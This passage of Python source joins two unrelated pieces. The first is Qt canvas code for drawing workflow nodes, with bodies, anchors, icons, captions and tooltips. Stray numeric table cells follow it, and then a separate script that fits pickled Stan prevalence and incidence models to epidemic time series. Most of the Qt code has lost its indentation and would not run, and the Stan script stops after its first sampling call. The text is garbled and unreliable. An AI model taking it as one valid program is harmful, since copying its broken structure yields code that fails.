    palette.setColor(QPalette.ButtonText, QColor("#515151"))
    return palette
def default_palette():
    """
    Create and return the default (yellow) palette for a node.
    """
    light = QColor(NAMED_COLORS["light-yellow"])
    base = QColor(NAMED_COLORS["yellow"])
    return create_palette(light, base)
def animation_restart(animation):
    """
    Restart `animation` from the beginning.

    A running animation is paused first so ``start`` rewinds it instead
    of being a no-op.
    """
    running = animation.state() == QPropertyAnimation.Running
    if running:
        animation.pause()
    animation.start()
# Color of the drop shadow drawn around node and anchor items.
SHADOW_COLOR = "#9CACB4"
# Outline color used when a node body has keyboard focus.
FOCUS_OUTLINE_COLOR = "#609ED7"
class NodeBodyItem(GraphicsPathObject):
    """
    The central part (body) of the `NodeItem`.

    Draws the elliptic body, its drop shadow, and a circular progress
    meter, and animates hover/selection/ping feedback.
    """

    def __init__(self, parent=None):
        GraphicsPathObject.__init__(self, parent)
        assert isinstance(parent, NodeItem)

        self.__processingState = 0
        self.__progress = -1
        self.__animationEnabled = False
        self.__isSelected = False
        self.__hasFocus = False
        self.__hover = False
        self.__shapeRect = QRectF(-10, -10, 20, 20)

        self.setAcceptHoverEvents(True)

        self.setFlag(QGraphicsItem.ItemSendsScenePositionChanges, True)
        self.setFlag(QGraphicsItem.ItemSendsGeometryChanges, True)

        self.setPen(QPen(Qt.NoPen))

        self.setPalette(default_palette())

        self.shadow = QGraphicsDropShadowEffect(
            blurRadius=3, color=QColor(SHADOW_COLOR), offset=QPointF(0, 0)
        )
        self.shadow.setEnabled(True)

        # An item with the same shape as this object, stacked behind this
        # item as a source for QGraphicsDropShadowEffect. Cannot attach
        # the effect to this item directly as QGraphicsEffect makes the item
        # non devicePixelRatio aware.
        shadowitem = GraphicsPathObject(self, objectName="shadow-shape-item")
        shadowitem.setPen(Qt.NoPen)
        shadowitem.setBrush(QBrush(QColor(SHADOW_COLOR).lighter()))
        shadowitem.setGraphicsEffect(self.shadow)
        shadowitem.setFlag(QGraphicsItem.ItemStacksBehindParent)
        self.__shadow = shadowitem
        self.__blurAnimation = QPropertyAnimation(self.shadow, b"blurRadius", self)
        self.__blurAnimation.setDuration(100)
        self.__blurAnimation.finished.connect(self.__on_finished)

        # 'Ping' animation briefly scales the item up (1.0 -> 1.1 -> 1.0).
        self.__pingAnimation = QPropertyAnimation(self, b"scale", self)
        self.__pingAnimation.setDuration(250)
        self.__pingAnimation.setKeyValues([(0.0, 1.0), (0.5, 1.1), (1.0, 1.0)])

    # TODO: The body item should allow the setting of arbitrary painter
    # paths (for instance rounded rect, ...)
    def setShapeRect(self, rect):
        """
        Set the item's shape `rect`. The item should be confined within
        this rect.
        """
        path = QPainterPath()
        path.addEllipse(rect)
        self.setPath(path)
        # Keep the shadow source item's shape in sync with the body.
        self.__shadow.setPath(path)
        self.__shapeRect = rect

    def setPalette(self, palette):
        """
        Set the body color palette (:class:`QPalette`).
        """
        self.palette = palette
        self.__updateBrush()

    def setAnimationEnabled(self, enabled):
        """
        Set the node animation enabled.
        """
        if self.__animationEnabled != enabled:
            self.__animationEnabled = enabled

    def setProcessingState(self, state):
        """
        Set the processing state of the node.
        """
        if self.__processingState != state:
            self.__processingState = state
            # 'Ping' when leaving the processing state.
            if not state and self.__animationEnabled:
                self.ping()

    def setProgress(self, progress):
        """
        Set the progress indicator state of the node. `progress` should
        be a number between 0 and 100.
        """
        self.__progress = progress
        self.update()

    def ping(self):
        """
        Trigger a 'ping' animation.
        """
        animation_restart(self.__pingAnimation)

    def hoverEnterEvent(self, event):
        self.__hover = True
        self.__updateShadowState()
        return GraphicsPathObject.hoverEnterEvent(self, event)

    def hoverLeaveEvent(self, event):
        self.__hover = False
        self.__updateShadowState()
        return GraphicsPathObject.hoverLeaveEvent(self, event)

    def paint(self, painter, option, widget):
        """
        Paint the shape and a progress meter.
        """
        # Let the default implementation draw the shape
        if option.state & QStyle.State_Selected:
            # Prevent the default bounding rect selection indicator.
            option.state = option.state ^ QStyle.State_Selected
        GraphicsPathObject.paint(self, painter, option, widget)

        if self.__progress >= 0:
            # Draw the progress meter over the shape.
            # Set the clip to shape so the meter does not overflow the shape.
            painter.save()
            painter.setClipPath(self.shape(), Qt.ReplaceClip)
            color = self.palette.color(QPalette.ButtonText)
            pen = QPen(color, 5)
            painter.setPen(pen)
            painter.setRenderHints(QPainter.Antialiasing)
            # 57.60 = 360 deg * 16 (Qt angles are in 1/16 deg) / 100 %.
            span = max(1, int(self.__progress * 57.60))
            painter.drawArc(self.__shapeRect, 90 * 16, -span)
            painter.restore()

    def __updateShadowState(self):
        # Refresh the pen (focus outline) and the drop-shadow blur radius
        # from the current focus/selected/hover state.
        if self.__hasFocus:
            color = QColor(FOCUS_OUTLINE_COLOR)
            self.setPen(QPen(color, 1.5))
        else:
            self.setPen(QPen(Qt.NoPen))

        # Blur radius grows with 'selected' and (even more) with 'hover'.
        radius = 3
        enabled = False

        if self.__isSelected:
            enabled = True
            radius = 7

        if self.__hover:
            radius = 17
            enabled = True

        if enabled and not self.shadow.isEnabled():
            self.shadow.setEnabled(enabled)

        if self.__animationEnabled:
            # Restart the blur animation from the current radius.
            if self.__blurAnimation.state() == QPropertyAnimation.Running:
                self.__blurAnimation.pause()

            self.__blurAnimation.setStartValue(self.shadow.blurRadius())
            self.__blurAnimation.setEndValue(radius)
            self.__blurAnimation.start()
        else:
            self.shadow.setBlurRadius(radius)

    def __updateBrush(self):
        # Selected nodes use the Active color group, others the Inactive one.
        palette = self.palette
        if self.__isSelected:
            cg = QPalette.Active
        else:
            cg = QPalette.Inactive

        palette.setCurrentColorGroup(cg)
        c1 = palette.color(QPalette.Light)
        c2 = palette.color(QPalette.Button)
        grad = radial_gradient(c2, c1)
        self.setBrush(QBrush(grad))

    # TODO: The selected and focus states should be set using the
    # QStyle flags (State_Selected. State_HasFocus)
    def setSelected(self, selected):
        """
        Set the `selected` state.

        .. note:: The item does not have `QGraphicsItem.ItemIsSelectable` flag.
                  This property is instead controlled by the parent NodeItem.

        """
        self.__isSelected = selected
        self.__updateBrush()

    def setHasFocus(self, focus):
        """
        Set the `has focus` state.

        .. note:: The item does not have `QGraphicsItem.ItemIsFocusable` flag.
                  This property is instead controlled by the parent NodeItem.

        """
        self.__hasFocus = focus
        self.__updateShadowState()

    def __on_finished(self):
        # Blur animation finished; if it faded out, disable the effect.
        if self.shadow.blurRadius() == 0:
            self.shadow.setEnabled(False)
class AnchorPoint(QGraphicsObject):
"""
A anchor indicator on the :class:`NodeAnchorItem`.
"""
#: Signal emitted when the item's scene position changes.
scenePositionChanged = Signal(QPointF)
#: Signal emitted when the item's `anchorDirection` changes.
anchorDirectionChanged = Signal(QPointF)
def __init__(self, *args):
QGraphicsObject.__init__(self, *args)
self.setFlag(QGraphicsItem.ItemSendsScenePositionChanges, True)
self.setFlag(QGraphicsItem.ItemHasNoContents, True)
self.__direction = QPointF()
def anchorScenePos(self):
"""
Return anchor position in scene coordinates.
"""
return self.mapToScene(QPointF(0, 0))
def setAnchorDirection(self, direction):
"""
Set the preferred direction (QPointF) in item coordinates.
"""
if self.__direction != direction:
self.__direction = direction
self.anchorDirectionChanged.emit(direction)
def anchorDirection(self):
"""
Return the preferred anchor direction.
"""
return self.__direction
def itemChange(self, change, value):
if change == QGraphicsItem.ItemScenePositionHasChanged:
self.scenePositionChanged.emit(value)
return QGraphicsObject.itemChange(self, change, value)
def boundingRect(self,):
return QRectF()
class NodeAnchorItem(GraphicsPathObject):
"""
The left/right widget input/output anchors.
"""
def __init__(self, parent, *args):
GraphicsPathObject.__init__(self, parent, *args)
self.setAcceptHoverEvents(True)
self.setPen(QPen(Qt.NoPen))
self.normalBrush = QBrush(QColor("#CDD5D9"))
self.connectedBrush = QBrush(QColor("#9CACB4"))
self.setBrush(self.normalBrush)
self.shadow = QGraphicsDropShadowEffect(
blurRadius=10, color=QColor(SHADOW_COLOR), offset=QPointF(0, 0)
)
self.setGraphicsEffect(self.shadow)
self.shadow.setEnabled(False)
# Does this item have any anchored links.
self.anchored = False
if isinstance(parent, NodeItem):
self.__parentNodeItem = parent
else:
self.__parentNodeItem = None
self.__anchorPath = QPainterPath()
self.__points = []
self.__pointPositions = []
self.__fullStroke = None
self.__dottedStroke = None
self.__shape = None
def parentNodeItem(self):
"""
Return a parent :class:`NodeItem` or ``None`` if this anchor's
parent is not a :class:`NodeItem` instance.
"""
return self.__parentNodeItem
def setAnchorPath(self, path):
"""
Set the anchor's curve path as a :class:`QPainterPath`.
"""
self.prepareGeometryChange()
self.__boundingRect = None
self.__anchorPath = path
# Create a stroke of the path.
stroke_path = QPainterPathStroker()
stroke_path.setCapStyle(Qt.RoundCap)
# Shape is wider (bigger mouse hit area - should be settable)
stroke_path.setWidth(12)
self.__shape = stroke_path.createStroke(path)
# The full stroke
stroke_path.setWidth(3)
self.__fullStroke = stroke_path.createStroke(path)
# The dotted stroke (when not connected to anything)
stroke_path.setDashPattern(Qt.DotLine)
self.__dottedStroke = stroke_path.createStroke(path)
if self.anchored:
self.setPath(self.__fullStroke)
self.setBrush(self.connectedBrush)
else:
self.setPath(self.__dottedStroke)
self.setBrush(self.normalBrush)
def anchorPath(self):
"""
Return the anchor path (:class:`QPainterPath`). This is a curve on
which the anchor points lie.
"""
return self.__anchorPath
def setAnchored(self, anchored):
"""
Set the items anchored state. When ``False`` the item draws it self
with a dotted stroke.
"""
self.anchored = anchored
if anchored:
self.setPath(self.__fullStroke)
self.setBrush(self.connectedBrush)
else:
self.setPath(self.__dottedStroke)
self.setBrush(self.normalBrush)
def setConnectionHint(self, hint=None):
"""
Set the connection hint. This can be used to indicate if
a connection can be made or not.
"""
raise NotImplementedError
def count(self):
"""
Return the number of anchor points.
"""
return len(self.__points)
def addAnchor(self, anchor, position=0.5):
"""
Add a new :class:`AnchorPoint` to this item and return it's index.
The `position` specifies where along the `anchorPath` is the new
point inserted.
"""
return self.insertAnchor(self.count(), anchor, position)
def insertAnchor(self, index, anchor, position=0.5):
"""
Insert a new :class:`AnchorPoint` at `index`.
See also
--------
NodeAnchorItem.addAnchor
"""
if anchor in self.__points:
raise ValueError("%s already added." % anchor)
self.__points.insert(index, anchor)
self.__pointPositions.insert(index, position)
anchor.setParentItem(self)
anchor.setPos(self.__anchorPath.pointAtPercent(position))
anchor.destroyed.connect(self.__onAnchorDestroyed)
self.__updatePositions()
self.setAnchored(bool(self.__points))
return index
def removeAnchor(self, anchor):
"""
Remove and delete the anchor point.
"""
anchor = self.takeAnchor(anchor)
anchor.hide()
anchor.setParentItem(None)
anchor.deleteLater()
def takeAnchor(self, anchor):
"""
Remove the anchor but don't delete it.
"""
index = self.__points.index(anchor)
del self.__points[index]
del self.__pointPositions[index]
anchor.destroyed.disconnect(self.__onAnchorDestroyed)
self.__updatePositions()
self.setAnchored(bool(self.__points))
return anchor
def __onAnchorDestroyed(self, anchor):
try:
index = self.__points.index(anchor)
except ValueError:
return
del self.__points[index]
del self.__pointPositions[index]
def anchorPoints(self):
"""
Return a list of anchor points.
"""
return list(self.__points)
def anchorPoint(self, index):
"""
Return the anchor point at `index`.
"""
return self.__points[index]
def setAnchorPositions(self, positions):
"""
Set the anchor positions in percentages (0..1) along the path curve.
"""
if self.__pointPositions != positions:
self.__pointPositions = list(positions)
self.__updatePositions()
def anchorPositions(self):
"""
Return the positions of anchor points as a list of floats where
each float is between 0 and 1 and specifies where along the anchor
path does the point lie (0 is at start 1 is at the end).
"""
return list(self.__pointPositions)
def shape(self):
if self.__shape is not None:
return self.__shape
else:
return GraphicsPathObject.shape(self)
def hoverEnterEvent(self, event):
self.shadow.setEnabled(True)
return GraphicsPathObject.hoverEnterEvent(self, event)
def hoverLeaveEvent(self, event):
self.shadow.setEnabled(False)
return GraphicsPathObject.hoverLeaveEvent(self, event)
def __updatePositions(self):
"""Update anchor points positions.
"""
for point, t in zip(self.__points, self.__pointPositions):
pos = self.__anchorPath.pointAtPercent(t)
point.setPos(pos)
class SourceAnchorItem(NodeAnchorItem):
"""
A source anchor item
"""
pass
class SinkAnchorItem(NodeAnchorItem):
"""
A sink anchor item.
"""
pass
def standard_icon(standard_pixmap):
"""
Return return the application style's standard icon for a
`QStyle.StandardPixmap`.
"""
style = QApplication.instance().style()
return style.standardIcon(standard_pixmap)
class GraphicsIconItem(QGraphicsItem):
"""
A graphics item displaying an :class:`QIcon`.
"""
def __init__(self, parent=None, icon=None, iconSize=None, **kwargs):
QGraphicsItem.__init__(self, parent, **kwargs)
self.setFlag(QGraphicsItem.ItemUsesExtendedStyleOption, True)
if icon is None:
icon = QIcon()
if iconSize is None:
style = QApplication.instance().style()
size = style.pixelMetric(style.PM_LargeIconSize)
iconSize = QSize(size, size)
self.__transformationMode = Qt.SmoothTransformation
self.__iconSize = QSize(iconSize)
self.__icon = QIcon(icon)
def setIcon(self, icon):
"""
Set the icon (:class:`QIcon`).
"""
if self.__icon != icon:
self.__icon = QIcon(icon)
self.update()
def icon(self):
"""
Return the icon (:class:`QIcon`).
"""
return QIcon(self.__icon)
def setIconSize(self, size):
"""
Set the icon (and this item's) size (:class:`QSize`).
"""
if self.__iconSize != size:
self.prepareGeometryChange()
self.__iconSize = QSize(size)
self.update()
def iconSize(self):
"""
Return the icon size (:class:`QSize`).
"""
return QSize(self.__iconSize)
def setTransformationMode(self, mode):
"""
Set pixmap transformation mode. (`Qt.SmoothTransformation` or
`Qt.FastTransformation`).
"""
if self.__transformationMode != mode:
self.__transformationMode = mode
self.update()
def transformationMode(self):
"""
Return the pixmap transformation mode.
"""
return self.__transformationMode
def boundingRect(self):
return QRectF(0, 0, self.__iconSize.width(), self.__iconSize.height())
def paint(self, painter, option, widget=None):
if not self.__icon.isNull():
if option.state & QStyle.State_Selected:
mode = QIcon.Selected
elif option.state & QStyle.State_Enabled:
mode = QIcon.Normal
elif option.state & QStyle.State_Active:
mode = QIcon.Active
else:
mode = QIcon.Disabled
w, h = self.__iconSize.width(), self.__iconSize.height()
target = QRect(0, 0, w, h)
painter.setRenderHint(
QPainter.SmoothPixmapTransform,
self.__transformationMode == Qt.SmoothTransformation,
)
self.__icon.paint(painter, target, Qt.AlignCenter, mode)
class NameTextItem(QGraphicsTextItem):
def __init__(self, *args, **kwargs):
super(NameTextItem, self).__init__(*args, **kwargs)
self.__selected = False
self.__palette = None
self.__content = ""
def paint(self, painter, option, widget=None):
if self.__selected:
painter.save()
painter.setPen(QPen(Qt.NoPen))
painter.setBrush(self.palette().color(QPalette.Highlight))
doc = self.document()
margin = doc.documentMargin()
painter.translate(margin, margin)
offset = min(margin, 2)
for line in self._lines(doc):
rect = line.naturalTextRect()
painter.drawRoundedRect(
rect.adjusted(-offset, -offset, offset, offset), 3, 3
)
painter.restore()
super(NameTextItem, self).paint(painter, option, widget)
def _blocks(self, doc):
block = doc.begin()
while block != doc.end():
yield block
block = block.next()
def _lines(self, doc):
for block in self._blocks(doc):
blocklayout = block.layout()
for i in range(blocklayout.lineCount()):
yield blocklayout.lineAt(i)
def setSelectionState(self, state):
if self.__selected != state:
self.__selected = state
self.__updateDefaultTextColor()
self.update()
def setPalette(self, palette):
if self.__palette != palette:
self.__palette = QPalette(palette)
self.__updateDefaultTextColor()
self.update()
def palette(self):
if self.__palette is None:
scene = self.scene()
if scene is not None:
return scene.palette()
else:
return QPalette()
else:
return QPalette(self.__palette)
def __updateDefaultTextColor(self):
if self.__selected:
role = QPalette.HighlightedText
else:
role = QPalette.WindowText
self.setDefaultTextColor(self.palette().color(role))
def setHtml(self, contents):
if contents != self.__content:
self.__content = contents
super().setHtml(contents)
class NodeItem(QGraphicsWidget):
"""
An widget node item in the canvas.
"""
#: Signal emitted when the scene position of the node has changed.
positionChanged = Signal()
#: Signal emitted when the geometry of the channel anchors changes.
anchorGeometryChanged = Signal()
#: Signal emitted when the item has been activated (by a mouse double
#: click or a keyboard)
activated = Signal()
#: The item is under the mouse.
hovered = Signal()
#: Span of the anchor in degrees
ANCHOR_SPAN_ANGLE = 90
#: Z value of the item
Z_VALUE = 100
def __init__(self, widget_description=None, parent=None, **kwargs):
self.__boundingRect = None
super().__init__(parent, **kwargs)
self.setFocusPolicy(Qt.ClickFocus)
self.setFlag(QGraphicsItem.ItemSendsGeometryChanges, True)
self.setFlag(QGraphicsItem.ItemHasNoContents, True)
self.setFlag(QGraphicsItem.ItemIsSelectable, True)
self.setFlag(QGraphicsItem.ItemIsMovable, True)
self.setFlag(QGraphicsItem.ItemIsFocusable, True)
# central body shape item
self.shapeItem = None
# in/output anchor items
self.inputAnchorItem = None
self.outputAnchorItem = None
# title text item
self.captionTextItem = None
# error, warning, info items
self.errorItem = None
self.warningItem = None
self.infoItem = None
self.__title = ""
self.__processingState = 0
self.__progress = -1
self.__statusMessage = ""
self.__error = None
self.__warning = None
self.__info = None
self.__anchorLayout = None
self.__animationEnabled = False
self.setZValue(self.Z_VALUE)
self.setupGraphics()
self.setWidgetDescription(widget_description)
@classmethod
def from_node(cls, node):
"""
Create an :class:`NodeItem` instance and initialize it from a
:class:`SchemeNode` instance.
"""
self = cls()
self.setWidgetDescription(node.description)
# self.setCategoryDescription(node.category)
return self
@classmethod
def from_node_meta(cls, meta_description):
"""
Create an `NodeItem` instance from a node meta description.
"""
self = cls()
self.setWidgetDescription(meta_description)
return self
def setupGraphics(self):
"""
Set up the graphics.
"""
shape_rect = QRectF(-24, -24, 48, 48)
self.shapeItem = NodeBodyItem(self)
self.shapeItem.setShapeRect(shape_rect)
self.shapeItem.setAnimationEnabled(self.__animationEnabled)
# Rect for widget's 'ears'.
anchor_rect = QRectF(-31, -31, 62, 62)
self.inputAnchorItem = SinkAnchorItem(self)
input_path = QPainterPath()
start_angle = 180 - self.ANCHOR_SPAN_ANGLE / 2
input_path.arcMoveTo(anchor_rect, start_angle)
input_path.arcTo(anchor_rect, start_angle, self.ANCHOR_SPAN_ANGLE)
self.inputAnchorItem.setAnchorPath(input_path)
self.outputAnchorItem = SourceAnchorItem(self)
output_path = QPainterPath()
start_angle = self.ANCHOR_SPAN_ANGLE / 2
output_path.arcMoveTo(anchor_rect, start_angle)
output_path.arcTo(anchor_rect, start_angle, -self.ANCHOR_SPAN_ANGLE)
self.outputAnchorItem.setAnchorPath(output_path)
self.inputAnchorItem.hide()
self.outputAnchorItem.hide()
# Title caption item
self.captionTextItem = NameTextItem(self)
self.captionTextItem.setPlainText("")
self.captionTextItem.setPos(0, 33)
def iconItem(standard_pixmap):
item = GraphicsIconItem(
self, icon=standard_icon(standard_pixmap), iconSize=QSize(16, 16)
)
item.hide()
return item
self.errorItem = iconItem(QStyle.SP_MessageBoxCritical)
self.warningItem = iconItem(QStyle.SP_MessageBoxWarning)
self.infoItem = iconItem(QStyle.SP_MessageBoxInformation)
self.prepareGeometryChange()
self.__boundingRect = None
# TODO: Remove the set[Widget|Category]Description. The user should
# handle setting of icons, title, ...
def setWidgetDescription(self, desc):
"""
Set widget description.
"""
self.widget_description = desc
if desc is None:
return
icon = icon_loader.from_description(desc).get(desc.icon)
if icon:
self.setIcon(icon)
if not self.title():
self.setTitle(desc.name)
if desc.inputs:
self.inputAnchorItem.show()
if desc.outputs:
self.outputAnchorItem.show()
tooltip = NodeItem_toolTipHelper(self)
self.setToolTip(tooltip)
def setWidgetCategory(self, desc):
"""
Set the widget category.
"""
self.category_description = desc
if desc and desc.background:
background = NAMED_COLORS.get(desc.background, desc.background)
color = QColor(background)
if color.isValid():
self.setColor(color)
def setIcon(self, icon):
"""
Set the node item's icon (:class:`QIcon`).
"""
if isinstance(icon, QIcon):
self.icon_item = GraphicsIconItem(
self.shapeItem, icon=icon, iconSize=QSize(36, 36)
)
self.icon_item.setPos(-18, -18)
else:
raise TypeError
def setColor(self, color, selectedColor=None):
"""
Set the widget color.
"""
if selectedColor is None:
selectedColor = saturated(color, 150)
palette = create_palette(color, selectedColor)
self.shapeItem.setPalette(palette)
def setTitle(self, title):
"""
Set the node title. The title text is displayed at the bottom of the
node.
"""
self.__title = title
self.__updateTitleText()
def title(self):
"""
Return the node title.
"""
return self.__title
title_ = Property(str, fget=title, fset=setTitle, doc="Node title text.")
def setFont(self, font):
"""
Set the title text font (:class:`QFont`).
"""
if font != self.font():
self.prepareGeometryChange()
self.captionTextItem.setFont(font)
self.__updateTitleText()
def font(self):
"""
Return the title text font.
"""
return self.captionTextItem.font()
def setAnimationEnabled(self, enabled):
"""
Set the node animation enabled state.
"""
if self.__animationEnabled != enabled:
self.__animationEnabled = enabled
self.shapeItem.setAnimationEnabled(enabled)
def animationEnabled(self):
"""
Are node animations enabled.
"""
return self.__animationEnabled
def setProcessingState(self, state):
"""
Set the node processing state i.e. the node is processing
(is busy) or is idle.
"""
if self.__processingState != state:
self.__processingState = state
self.shapeItem.setProcessingState(state)
if not state:
# Clear the progress meter.
self.setProgress(-1)
if self.__animationEnabled:
self.shapeItem.ping()
def processingState(self):
"""
The node processing state.
"""
return self.__processingState
processingState_ = Property(int, fget=processingState, fset=setProcessingState)
def setProgress(self, progress):
"""
Set the node work progress state (number between 0 and 100).
"""
if progress is None or progress < 0 or not self.__processingState:
progress = -1
progress = max(min(progress, 100), -1)
if self.__progress != progress:
self.__progress = progress
self.shapeItem.setProgress(progress)
self.__updateTitleText()
def progress(self):
"""
Return the node work progress state.
"""
return self.__progress
progress_ = Property(
float, fget=progress, fset=setProgress, doc="Node progress state."
)
def setStatusMessage(self, message):
"""
Set the node status message text.
This text is displayed below the node's title.
"""
if self.__statusMessage != message:
self.__statusMessage = message
self.__updateTitleText()
def statusMessage(self):
return self.__statusMessage
def setStateMessage(self, message):
"""
Set a state message to display over the item.
Parameters
----------
message : UserMessage
Message to display. `message.severity` is used to determine
the icon and `message.contents` is used as a tool tip.
"""
# TODO: Group messages by message_id not by severity
# and deprecate set[Error|Warning|Error]Message
if message.severity == UserMessage.Info:
self.setInfoMessage(message.contents)
elif message.severity == UserMessage.Warning:
self.setWarningMessage(message.contents)
elif message.severity == UserMessage.Error:
self.setErrorMessage(message.contents)
def setErrorMessage(self, message):
if self.__error != message:
self.__error = message
self.__updateMessages()
def setWarningMessage(self, message):
if self.__warning != message:
self.__warning = message
self.__updateMessages()
def setInfoMessage(self, message):
if self.__info != message:
self.__info = message
self.__updateMessages()
def newInputAnchor(self):
"""
Create and return a new input :class:`AnchorPoint`.
"""
if not (self.widget_description and self.widget_description.inputs):
raise ValueError("Widget has no inputs.")
anchor = AnchorPoint()
self.inputAnchorItem.addAnchor(anchor, position=1.0)
positions = self.inputAnchorItem.anchorPositions()
positions = uniform_linear_layout(positions)
self.inputAnchorItem.setAnchorPositions(positions)
return anchor
def removeInputAnchor(self, anchor):
"""
Remove input anchor.
"""
self.inputAnchorItem.removeAnchor(anchor)
positions = self.inputAnchorItem.anchorPositions()
positions = uniform_linear_layout(positions)
self.inputAnchorItem.setAnchorPositions(positions)
def newOutputAnchor(self):
"""
Create and return a new output :class:`AnchorPoint`.
"""
if not (self.widget_description and self.widget_description.outputs):
raise ValueError("Widget has no outputs.")
anchor = AnchorPoint(self)
self.outputAnchorItem.addAnchor(anchor, position=1.0)
positions = self.outputAnchorItem.anchorPositions()
positions = uniform_linear_layout(positions)
self.outputAnchorItem.setAnchorPositions(positions)
return anchor
def removeOutputAnchor(self, anchor):
"""
Remove output anchor.
"""
self.outputAnchorItem.removeAnchor(anchor)
positions = self.outputAnchorItem.anchorPositions()
positions = uniform_linear_layout(positions)
self.outputAnchorItem.setAnchorPositions(positions)
def inputAnchors(self):
"""
Return a list of all input anchor points.
"""
return self.inputAnchorItem.anchorPoints()
def outputAnchors(self):
"""
Return a list of all output anchor points.
"""
return self.outputAnchorItem.anchorPoints()
def setAnchorRotation(self, angle):
"""
Set the anchor rotation.
"""
self.inputAnchorItem.setRotation(angle)
self.outputAnchorItem.setRotation(angle)
self.anchorGeometryChanged.emit()
def anchorRotation(self):
"""
Return the anchor rotation.
"""
return self.inputAnchorItem.rotation()
def boundingRect(self):
# TODO: Important because of this any time the child
# items change geometry the self.prepareGeometryChange()
# needs to be called.
if self.__boundingRect is None:
self.__boundingRect = self.childrenBoundingRect()
return self.__boundingRect
def shape(self):
# Shape for mouse hit detection.
# TODO: Should this return the union of all child items?
return self.shapeItem.shape()
def __updateTitleText(self):
"""
Update the title text item.
"""
text = ['<div align="center">%s' % escape(self.title())]
status_text = []
progress_included = False
if self.__statusMessage:
msg = escape(self.__statusMessage)
format_fields = dict(parse_format_fields(msg))
if "progress" in format_fields and len(format_fields) == 1:
# Insert progress into the status text format string.
spec, _ = format_fields["progress"]
if spec != None:
progress_included = True
progress_str = "{0:.0f}%".format(self.progress())
status_text.append(msg.format(progress=progress_str))
else:
status_text.append(msg)
if self.progress() >= 0 and not progress_included:
status_text.append("%i%%" % int(self.progress()))
if status_text:
text += [
"<br/>",
'<span style="font-style: italic">',
"<br/>".join(status_text),
"</span>",
]
text += ["</div>"]
text = "".join(text)
# The NodeItems boundingRect could change.
self.prepareGeometryChange()
self.__boundingRect = None
self.captionTextItem.setHtml(text)
self.captionTextItem.document().adjustSize()
width = self.captionTextItem.textWidth()
self.captionTextItem.setPos(-width / 2.0, 33)
def __updateMessages(self):
"""
Update message items (position, visibility and tool tips).
"""
items = [self.errorItem, self.warningItem, self.infoItem]
messages = [self.__error, self.__warning, self.__info]
for message, item in zip(messages, items):
item.setVisible(bool(message))
item.setToolTip(message or "")
shown = [item for item in items if item.isVisible()]
count = len(shown)
if count:
spacing = 3
rects = [item.boundingRect() for item in shown]
width = sum(rect.width() for rect in rects)
width += spacing * max(0, count - 1)
height = max(rect.height() for rect in rects)
origin = self.shapeItem.boundingRect().top() - spacing - height
origin = QPointF(-width / 2, origin)
for item, rect in zip(shown, rects):
item.setPos(origin)
origin = origin + QPointF(rect.width() + spacing, 0)
def mousePressEvent(self, event):
if self.shapeItem.path().contains(event.pos()):
return super().mousePressEvent(event)
else:
event.ignore()
def mouseDoubleClickEvent(self, event):
if self.shapeItem.path().contains(event.pos()):
super().mouseDoubleClickEvent(event)
QTimer.singleShot(0, self.activated.emit)
else:
event.ignore()
def contextMenuEvent(self, event):
if self.shapeItem.path().contains(event.pos()):
return super().contextMenuEvent(event)
else:
event.ignore()
def focusInEvent(self, event):
self.shapeItem.setHasFocus(True)
return super().focusInEvent(event)
def focusOutEvent(self, event):
self.shapeItem.setHasFocus(False)
return super().focusOutEvent(event)
def changeEvent(self, event):
if event.type() == QEvent.PaletteChange:
self.__updatePalette()
elif event.type() == QEvent.FontChange:
self.__updateFont()
super().changeEvent(event)
def itemChange(self, change, value):
if change == QGraphicsItem.ItemSelectedChange:
self.shapeItem.setSelected(value)
self.captionTextItem.setSelectionState(value)
elif change == QGraphicsItem.ItemPositionHasChanged:
self.positionChanged.emit()
return super().itemChange(change, value)
def __updatePalette(self):
self.captionTextItem.setPalette(self.palette())
def __updateFont(self):
self.prepareGeometryChange()
self.captionTextItem.setFont(self.font())
self.__updateTitleText()
TOOLTIP_TEMPLATE = """\
<html>
<head>
<style type="text/css">
{style}
</style>
</head>
<body>
{tooltip}
</body>
</html>
"""
def NodeItem_toolTipHelper(node, links_in=[], links_out=[]):
"""
A helper function for constructing a standard tooltip for the node
in on the canvas.
Parameters:
===========
node : NodeItem
The node item instance.
links_in : list of LinkItem instances
A list of input links for the node.
links_out : list of LinkItem instances
A list of output links for the node.
"""
desc = node.widget_description
channel_fmt = "<li>{0}</li>"
title_fmt = "<b>{title}</b><hr/>"
title = title_fmt.format(title=escape(node.title()))
inputs_list_fmt = "Inputs:<ul>{inputs}</ul><hr/>"
outputs_list_fmt = "Outputs:<ul>{outputs}</ul>"
if desc.inputs:
inputs = [channel_fmt.format(inp.name) for inp in desc.inputs]
inputs = inputs_list_fmt.format(inputs="".join(inputs))
else:
inputs = "No inputs<hr/>"
if desc.outputs:
outputs = [channel_fmt.format(out.name) for out in desc.outputs]
outputs = outputs_list_fmt.format(outputs="".join(outputs))
else:
outputs = "No outputs"
tooltip = title + inputs + outputs
style = "ul { margin-top: 1px; margin-bottom: 1px; }"
return TOOLTIP_TEMPLATE.format(style=style, tooltip=tooltip)
def parse_format_fields(format_str):
formatter = string.Formatter()
format_fields = [
(field, (spec, conv))
for _, field, spec, conv in formatter.parse(format_str)
if field is not None
]
return format_fields | 0.662251 | 0.226891 |
import pandas as pd
import pickle
from os.path import join
model_dir = '../../stan_models/models_bin/'
ts_dir = '../time_series/SM/'
res_dir = '../results/SM/'
# Load models
with open(join(model_dir, 'prevalence_model.bin'), 'rb') as f:
prevalence_model = pickle.load(f)
with open(join(model_dir, 'incidence_model.bin'), 'rb') as f:
incidence_model = pickle.load(f)
# Loop over time series and sample from the posterior distribution
for ts_file in ['T50_sigma_0p02',
'T100_sigma_0p02',
'T250_sigma_0p02']:
# Read data as CSV
df = pd.read_csv(join(ts_dir, ts_file + ".txt"), sep='\t')
# Normalize time
t = df['t'] / df['t'].iloc[-1]
# Prepare data dicts
data_prevalence = {'T': len(t),
'ts': t,
'Y': df['Y(t)'],
# Hyperparameters
'scale_sigma': 1,
'scale_gamma': 100,
'scale_xi_mean': 100,
'scale_xi_spread': 1,
'N': 8,
# Misc.
'overshoot': 0.1,
'num_steps_beta': 100,
'num_steps_y': 100,
'max_iter': 25000}
data_incidence = {'T': len(t),
'ts': t,
'Z': df['Z(t)'],
'population': 100000,
'max_Y': 1,
# Hyperparameters
'scale_sigma': 1,
'loc_gamma': 0.1 * df['t'].iloc[-1],
'scale_gamma': 0.1,
'scale_xi_mean': 100,
'scale_xi_spread': 1,
'N': 8,
# Misc.
'overshoot': 0.00,
'num_steps_beta': 100,
'num_steps_y': 100,
'max_iter': 25000}
# Fit with prevalence model and dump results to disk
fit = prevalence_model.sampling(data_prevalence,
iter=1000, chains=4,
control={'max_treedepth': 15})
